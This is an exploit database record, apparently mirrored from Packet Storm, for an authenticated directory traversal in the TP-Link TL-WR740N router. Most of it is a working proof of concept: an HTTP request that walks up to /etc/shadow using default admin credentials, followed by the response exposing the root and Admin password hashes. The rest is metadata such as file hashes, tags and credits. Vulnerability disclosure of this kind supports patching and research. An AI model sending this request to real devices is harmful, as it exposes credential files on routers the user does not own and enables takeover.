ID

VAR-E-202307-0298


TITLE

TP-Link TL-WR740N Directory Traversal

Trust: 0.5

sources: PACKETSTORM: 173644

DESCRIPTION

TP-Link TL-WR740N suffers from a directory traversal vulnerability.

Trust: 0.5

sources: PACKETSTORM: 173644

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr740nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 173644

EXPLOIT

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal
# Date: 13/7/2023
# Exploit Author: Anish Feroz (Zeroxinn)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

---------------------------POC---------------------------

Request
-------

GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Response
--------

HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

Trust: 0.5

sources: PACKETSTORM: 173644

EXPLOIT HASH

LOCAL

SOURCE

md5: 663ff67fd330688b603cecb155d34285
sha-1: 9c5525ad55340922546a99d90ae9a8378642b53d
sha-256: 9921f0618489f2238ea4711dca70b775315474df0a738e8e0b184f4aad4846b9
sha-256: 9921f0618489f2238ea4711dca70b775315474df0a738e8e0b184f4aad4846b9

Trust: 0.5

sources: PACKETSTORM: 173644

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 173644

TYPE

file inclusion

Trust: 0.5

sources: PACKETSTORM: 173644

TAGS

tag:exploit

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 173644

CREDITS

Anish Feroz

Trust: 0.5

sources: PACKETSTORM: 173644

EXTERNAL IDS

db:PACKETSTORMid:173644

Trust: 0.5

sources: PACKETSTORM: 173644

SOURCES

db:PACKETSTORMid:173644

LAST UPDATE DATE

2024-03-21T15:18:11.457000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:173644date:2023-07-20T15:58:04